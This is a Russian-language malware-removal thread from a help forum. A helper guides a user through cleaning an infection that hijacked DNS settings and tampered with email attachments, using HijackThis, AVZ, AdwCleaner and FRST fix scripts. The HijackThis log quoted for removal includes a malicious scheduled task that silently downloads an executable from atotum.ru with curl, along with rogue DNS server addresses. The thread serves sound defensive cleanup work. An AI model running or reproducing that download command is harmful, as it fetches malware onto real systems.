Все файлы из почты шифруются в архив

[Chifach]

Добрый день!
Столкнулся с проблемой, когда все файлы скаченные с почты шифруются в архив, при попытки их открыть его, программа "Stirka" прост доступ к компьютеру(найти ее так и не смог).
Антивирусы на компьютере ругаются на эти архивы и говорят, что там вирус при этом на самом компе вирусы не обнаруживаются...
Файл в вложении, заранее спасибо!

[Info_bot]

Уважаемый(ая) Chifach, спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Chifach]

Добрый день!
Хочу уточнить по поводу заголовка "Поислать запрошенный карантин".
Я выслал какие-то не те файлы или должен прислать ещё что-то?

[Chifach]

Добрый день!
Карантин подгрузил...

[Vvvyg]

Логи в карантин не нужно! Карантин пока никто у вас не запрашивал.

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 35.177.46.238
O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 46.101.28.31
O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 82.202.226.203
O22 - Task: curl - C:\Users\1\AppData\Roaming\curl\curl_7_54.exe -f -s -L http://atotum.ru/f.exe -o "C:\Users\1\AppData\Roaming\curl\curl.exe"
O22 - Task: curls - C:\Users\1\AppData\Roaming\curl\curl.exe (file missing)

Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".

Код:

>>>  "C:\Users\1\Documents\Мои документы PaperPort\Неиспользуемые ярлыки\Mail.Ru Агент.lnk"          -> ["C:\Program Files\Mail.Ru\Agent\magent.exe"]
>>>  "C:\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Yandex\Yandex.lnk"  -> ["C:\Users\1\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"]
- "C:\Users\1\Documents\Мои документы PaperPort\Неиспользуемые ярлыки\Искать в Интернете.url"  ->   hxxp://go.mail.ru/?sct=1
>>>  "C:\Users\1\Favorites\Links\Интернет.url"  ->                    hxxp://klakali.ru/?utm_source=favorites03&utm_content=d024e102c3406f9b728065963fbb0e2d&utm_term=E02B5EF0A75FFDA17F4AEDE6BD0EA971&utmd=20180205

Отчёт о работе прикрепите.

Сделайте лог Malwarebytes AdwCleaner.

[Chifach]

Добрый день!
Спасибо большое за помощь!
Сделал все по инструкции но теперь при закачке файлов с почты возникает ошибка 502 Bad Gateway nginx, очистка кукис не помогла. Если же печатать документ из почты касперский все равно блокирует вредоносную ссылку atotum.ru/f.exe
Отчеты о работе прикрепил, а так же новый отчет сканирования.

[Vvvyg]

Пофиксите в HijackThis:

Код:

O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 35.177.46.238
O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 46.101.28.31
O17 - HKLM\System\CCS\Services\Tcpip\..\{5183ee0e-91e2-4f52-bdd6-23d89a6977b3}: [NameServer] = 82.202.226.203

Выполните скрипт в AVZ:

Код:

begin
 DeleteFile('C:\Users\1\AppData\Roaming\curl\curl.exe', '32');
 ExecuteFile('ipconfig.exe', '/flushdns', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
 DeleteFileMask('c:\users\1\appdata\roaming\curl', '*', true);
 DeleteDirectory('c:\users\1\appdata\roaming\curl');
 DelBHO('{8E8F97CD-60B5-456F-A201-73065652D099}');
ExecuteSysClean;
 ExecuteRepair(21);
 ExecuteWizard('SCU', 2, 2, true);
RebootWindows(false);
end.

Компьютер перезагрузится.

Удалите всё найденное в AdwCleaner, дождитесь окончания удаления и перезагрузите систему по требованию программы.
После входа в систему откроется отчёт AdwCleaner - файл AdwCleaner[C0].txt, прикрепите к своему следующему сообщению.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

[Chifach]

Добрый день!
Помогло! Спасибо огромное!

[Vvvyg]

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
SearchScopes: HKU\S-1-5-21-2357683297-2286656275-180238905-1001 -> {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://go-search.ru/search?q={searchTerms}
FF Homepage: Mozilla\Firefox\Profiles\h9mwzorn.default -> hxxp://granena.ru/?utm_content=31b5cebd524a9af6c7a772dca81815e9&utm_source=startpm&utm_term=c533b6e879dca59697666fef6c996b67&utm_d=20180201
FF Extension: (Пульт) - C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\h9mwzorn.default\Extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}.xpi [2018-02-01]
CHR HKU\S-1-5-21-2357683297-2286656275-180238905-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [odijcgafkhpobjlnfdgiacpdenpmbgme] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2357683297-2286656275-180238905-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [phkdcinmmljblpnkohlipaiodlonpinf] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2357683297-2286656275-180238905-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pmpoaahleccaibbhfjfimigepmfmmbbk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [dloebpogmbloiggbbkganacecpobmlde] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lgdnilodcpljomelbbnpgdogdbmclbni] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ngdlmklkpclkhjopnhihdedhjgjmhlaa] - hxxps://clients2.google.com/service/update2/crx
FirewallRules: [{233B9328-6A84-4100-A2F2-A950EA440DD8}] => (Allow) C:\Users\1\AppData\Local\yc\Application\yc.exe
Reboot:

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

[Chifach]

Сделано!

[Vvvyg]

Проблемы решены?

[Chifach]

Да! Все работает!
Спасибо!

[Vvvyg]

Запустите AdwCleaner и нажмите Файл (File) -> Деинсталлировать (Uninstall).

Удалите папку C:\FRST со всем содержимым.

Выполните рекомендации после лечения.

[CyberHelper]

Статистика проведенного лечения:

• Получено карантинов: 1
• Обработано файлов: 5
• В ходе лечения вредоносные программы в карантинах не обнаружены